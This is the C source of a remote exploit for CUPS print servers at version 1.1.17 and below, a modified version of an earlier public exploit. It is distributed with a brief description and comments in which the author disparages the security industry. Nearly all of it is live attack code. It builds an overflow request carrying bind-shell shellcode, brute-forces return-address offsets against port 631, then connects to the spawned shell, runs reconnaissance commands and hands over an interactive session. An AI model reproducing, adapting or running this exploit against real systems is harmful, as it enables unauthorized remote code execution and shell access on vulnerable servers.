Cups v1.1.17 and below remote exploit which spawns a shell as lp. Modified version of the original sigcups.c exploit.
5a88fad62d69412d2762fa193f415a3d84cba3182a07cc0ff828178c6b46a28d
/* DEMOCOW-BRUTE-CUPS.c by democow "the sad cow"
this is a modified version of sigcups.c by sigdoon
i had a need for this, so i wrote this
i am sad beacuse so much open source/public exploit code is abused
by info$ec now any open discussion has become
their helping hand in other words.........
young fish must not eat their tainted worms
TODO:
1. add support for new cups partial request DoS just for fun
2. look though cups source a little more and find a better way to ID
vuln servers
3. improve the server-offset feature
4. add arm shellcode,and libc addrs
5. add hostlookups
THIS CODE IS PRIVATE, DO NOT DISTRIBUTE... DO NOT SUPPORT THE INFO$EC
INDUSTRY, THEY ARE EXPLOITING YOU WITH YOUR EXPLOITS
democow8086@hotmail.com
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>
#define BUF_SIZE 4096
#define SERVER_ID "CUPS/1.1" //8 bytes long
#define die(a) { perror("[!] "a); exit(-1); }
//this will be added to when the correct offsets for
//certin systems have been found
typedef struct identified
{
int type;
char os[1040];
int offset;
}target;
int buildAttack(int offset,char *host, int port)
{
char hellcode[]=
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
struct sockaddr_in dest;
int i,off,sock;
unsigned long retaddr = 805289688;
char buf[BUF_SIZE];
char buf2[BUF_SIZE];
char greet[] = "POST /jobs HTTP/1.1\nContent-type: application/x-www-form-urlencoded\nContent-length: %d\n\n";
char evilmsg[] = "-%u=";
//it is just sad to have an integer overflow
//within an integer overflow exploit
if(offset < 0)
{
printf("[*] integer overflow alert please increase the size of offset\n");
return 1;
}
retaddr += offset;
printf("[*] connecting to %s port %d\n", host, port);
printf("[*] trying retaddr = 0x%x; *4 = 0x%x\n", retaddr, retaddr*4);
printf("[*] the current offset is %i\n",offset);
if ( (sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
{
perror("socket()");
return 1; //return fail
}
dest.sin_family = AF_INET;
dest.sin_port = htons(port);
dest.sin_addr.s_addr = inet_addr(host);
bzero( &(dest.sin_zero), 8);
if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr))<0)
{
perror("connect()");
return 1; //return fail
}
printf("[*] connect created attempting to brute\n");
off = sprintf(buf, evilmsg, retaddr);
for(i = 0; i<sizeof(hellcode)-1; i++)
sprintf(buf+off+i*3, "%%%02X", (unsigned char)hellcode[i]);
//load greet
sprintf(buf2, greet, strlen(buf));
//send our crafted data out
write(sock, buf2, strlen(buf2) );
write(sock,buf, strlen(buf) );
close(sock);
return 0; //attack sent :) be happy you sad cow
}
//this will verify if the exploit worked
int shellConnect(char *host)
{
struct sockaddr_in target;
fd_set rset;
int socketfd;
int happy = 0;
int incomming;
char buffer[BUF_SIZE];
//i want to let socket() errors end the program in a messy way
if( (socketfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
die("socket()");
target.sin_family = AF_INET;
target.sin_port = htons(5074);
target.sin_addr.s_addr = inet_addr(host);
bzero(&(target.sin_zero), 8);
//note to democow rewrite this ASAP
system("sleep 3");
if(connect(socketfd, (struct sockaddr*)&target,sizeof(struct sockaddr)) < 0)
{
perror("connect");
return 1;//return with exploit fail
} else { happy = 1;}
write(socketfd,"id;uname -a;cat /etc/*rel*\n",27);
while(happy =1)
{
FD_ZERO(&rset);
FD_SET(socketfd,&rset);
FD_SET(STDIN_FILENO, &rset);
select(socketfd+1,&rset,NULL, NULL, NULL);
if(FD_ISSET(socketfd,&rset) )
{
incomming = read(socketfd,buffer, BUF_SIZE-1);
if(incomming <= 0)
{
printf("[*] Connection Lost Sorry Mate\n");
close(socketfd);
return 2; //return with a conn lost retry
}
buffer[incomming] = 0;
printf("%s", buffer);
}
if(FD_ISSET(STDIN_FILENO, &rset) )
{
incomming = read(STDIN_FILENO, buffer, BUF_SIZE - 1);
if(incomming > 0)
{
buffer[incomming] = 0;
write(socketfd, buffer, incomming);
} //end if(incomming)
}//end STDIN_FILENO check
}//end while
return 0; //this will never be reached
}
int main(int argc, char *argv[])
{
int running;
int offset;
char *target;
int temp;
running = 1;
offset = 0;
if(argc < 2)
{
printf("USEAGE %s [IP TO ATTACK]\n",argv[0]);
//this is all one big joke to me
__asm__("movb $0x01, %al");
__asm__("int $0x80");
} else { target = argv[1]; }
//start the fun loop :)
while(running == 1)
{
if( (temp= buildAttack(offset,target,631)) ==1)
{
printf("major connection failure aborting\n");
running = 0; //connection failures are upsetting
return 0;
}
switch ( (temp = shellConnect(target) ))
{
case '1': //general fail.. i except aton of these
offset++;
break;
case '2':
offset = offset; //i could do nothing but dun wanna
break;
case '0': //are we all done?
return 0; //i dont understand why i do this
break;
default:
offset++; //why not
break;
}
}
printf("you are a beast of your mind mr. cow\n");
return 0;
}
--
This message has been sent via an anonymous mail relay at www.no-id.com.